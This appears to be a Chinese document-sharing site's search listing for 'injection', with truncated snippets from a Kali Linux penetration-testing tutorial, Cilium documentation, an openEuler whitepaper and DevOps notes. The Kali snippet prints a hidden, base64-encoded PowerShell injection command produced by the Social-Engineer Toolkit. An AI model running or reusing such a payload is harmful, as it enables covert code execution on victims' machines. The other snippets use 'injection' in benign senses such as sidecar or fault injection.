大学霸 Kali Linux 安全渗透教程discovery/info_disclosure/interesting_files Exploitation ------------ exploitation/injection/command_injector exploitation/injection/xpath_bruter Import ------ import/csv_file Recon ----- recon/compa x86_powershell_injection.txt。 (5)此时再打开一个终端窗口,查看渗透攻击文件的内容,如下所示: root@kali:~# cd /root/.set/reports/powershell/ root@kali:~/.set/reports/powershell# ls powershell.rc x86_powershell_injection.txt root@kali:~/ root@kali:~/.set/reports/powershell# cat x86_powershell_injection.txt powershell -nop -windows hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBb AEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAG0 码力 | 444 页 | 25.79 MB | 1 年前3
Containers and BPF: twagent story(netns is in-use) ○ transparent proxy (mostly for TLS) ○ container firewall ○ network faults injection ○ network counters (rack, datacenter, region) ● but not only: ○ sysctl access control Let’s by service name (dynamic set of IP:port endpoints) Container firewall (twfw) Network faults injection: ● Same per-packet firewall is used ● Attached to a task on-demand by API call ● Action can be0 码力 | 9 页 | 427.42 KB | 1 年前3
openEuler OS Technical Whitepaper
Innovation Projects
(June, 2023)Innovation Projects Rubik solution Kubernetes cluster Worker node Service to be scheduled Injection-based feature analysis QoS model training Pre-analysis apiserver Interference-aware scheduler stage address translation reduces performance overhead for memory, and hardware-based interrupt injection reduces the context overhead and interrupt latency. The following figure shows the overall architecture0 码力 | 116 页 | 3.16 MB | 1 年前3
The DevOps HandbookREHEARSE FAILURES i. Game Days – exercise designed to increase resilience through large-scale fault injection across critical systems ii. Simulate and rehearse accidents for practice 1. Schedule the event0 码力 | 9 页 | 25.13 KB | 5 月前3
Cilium v1.10 Documentationsidecar proxies when you deploy your application later: kubectl label namespace default istio-injection=enabled Step 3: Deploy the Bookinfo Application V1 Now that we have Cilium and Istio deployed microservice, specific to each service version. To deploy the application with manual sidecar injection, run: for service in productpage-service productpage-v1 details-v1 reviews-v1; do kubectl experience any problems. Network Security Introduction Identity-based Policy Enforcement Proxy Injection Introduction Cilium provides security on multiple levels. Each can be used individually or combined0 码力 | 1307 页 | 19.26 MB | 1 年前3
Cilium v1.9 Documentationsidecar proxies when you deploy your application later: kubectl label namespace default istio-injection=enabled Step 3: Deploy the Bookinfo Application V1 Now that we have Cilium and Istio deployed microservice, specific to each service version. To deploy the application with manual sidecar injection, run: for service in productpage-service productpage-v1 details-v1 reviews-v1; do kubectl experience any problems. Network Security Introduction Identity-based Policy Enforcement Proxy Injection Introduction Cilium provides security on multiple levels. Each can be used individually or combined0 码力 | 1263 页 | 18.62 MB | 1 年前3
Cilium v1.11 Documentationsidecar proxies when you deploy your application later: kubectl label namespace default istio-injection=enabled Step 3: Deploy the Bookinfo Application V1 Now that we have Cilium and Istio deployed experience any problems. Network Security Introduction Identity-based Policy Enforcement Proxy Injection Introduction Cilium provides security on multiple levels. Each can be used individually or combined L4 policy to an endpoint will block all connectivity to ports unless explicitly allowed. Proxy Injection Cilium is capable of transparently injecting a Layer 4 proxy into any network connection. This0 码力 | 1373 页 | 19.37 MB | 1 年前3
Cilium v1.8 Documentationsidecar proxies when you deploy your application later: kubectl label namespace default istio-injection=enabled Step 3: Deploy the Bookinfo Application V1 Now that we have Cilium and Istio deployed microservice, specific to each service version. To deploy the application with manual sidecar injection, run: for service in productpage-service productpage-v1 details-v1 reviews-v1; do kubectl experience any problems. Network Security Introduction Identity-based Policy Enforcement Proxy Injection Introduction Cilium provides security on multiple levels. Each can be used individually or combined0 码力 | 1124 页 | 21.33 MB | 1 年前3
Cilium v1.6 Documentationsidecar proxies when you deploy your application later: kubectl label namespace default istio-injection=enabled Step 3: Deploy the Bookinfo Application V1 Now that we have Cilium and Istio deployed microservice, specific to each service version. To deploy the application with manual sidecar injection, run: for service in productpage-service productpage-v1 details-v1 reviews-v1; do kubectl necessary but came with drawbacks as well such as needing to busy poll the NIC and expensive packet re-injection into the kernel’s stack. The migration over to eBPF and XDP combined best of both worlds by having0 码力 | 734 页 | 11.45 MB | 1 年前3
Cilium v1.7 Documentationsidecar proxies when you deploy your application later: kubectl label namespace default istio-injection=enabled Step 3: Deploy the Bookinfo Application V1 Now that we have Cilium and Istio deployed microservice, specific to each service version. To deploy the application with manual sidecar injection, run: for service in productpage-service productpage-v1 details-v1 reviews-v1; do kubectl necessary but came with drawbacks as well such as needing to busy poll the NIC and expensive packet re-injection into the kernel’s stack. The migration over to eBPF and XDP combined best of both worlds by having0 码力 | 885 页 | 12.41 MB | 1 年前3
共 41 条
- 1
- 2
- 3
- 4
- 5













